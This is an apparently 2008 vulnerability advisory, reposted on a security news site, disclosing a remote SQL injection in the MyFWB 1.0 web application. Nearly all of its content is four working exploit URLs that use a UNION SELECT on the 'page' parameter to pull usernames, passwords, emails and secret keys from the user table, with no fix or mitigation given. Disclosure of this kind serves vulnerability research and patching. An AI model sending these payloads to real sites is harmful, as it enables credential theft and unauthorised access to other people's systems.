Computer Security

Security Advisory: MyFWB 1.0 Remote SQL Injection
back  news / advisories / forum / software / advertising / search / exploits  forward
[EN] securityvulns.ru
no-pyccku



Related information

  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

  Xss In Datalife Engine CMS 7.2

  [MajorSecurity Advisory #54]xt:Commerce - Cross Site Scripting and Session Fixation Issues

  [MajorSecurity Advisory #53]BLUEPAGE CMS - Cross Site Scripting and Session Fixation Issues

  Cross Site Scripting (XSS) Vulnerabilitiy in fuzzylime (cms) >=3.02, CVE-2008-3098

From:Guns_(at)_0x90.com.ar <Guns_(at)_0x90.com.ar>
Date:24.09.2008
Subject:MyFWB 1.0 Remote SQL Injection

MyFWB 1.0 Remote SQL Injection

Author: 0x90
url: www.0x90.com.ar
Product: MyFWB
download: http://myfwb.co.cc/downloads/myfwb_1.0_FS_edition.zip
Version: 1.0
URL: http://www.fsoft.co.nr/
Vulnerability Class: SQL Injection
contact: Guns[at]0x90[dot]com[dot]ar


Username:
http://host/MyFWB/?page=-0x90+union+select+0,0,username,0+from+user

Password:
http://host/MyFWB/?page=-0x90+union+select+0,0,password,0+from+user

Email:
http://host/MyFWB/?page=-0x90+union+select+0,0,useremail,0+from+user

Secret Key:
http://host/MyFWB/?page=-0x90+union+select+0,0,secret,0+from+user
About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod

 
 


Rating@Mail.ru
test server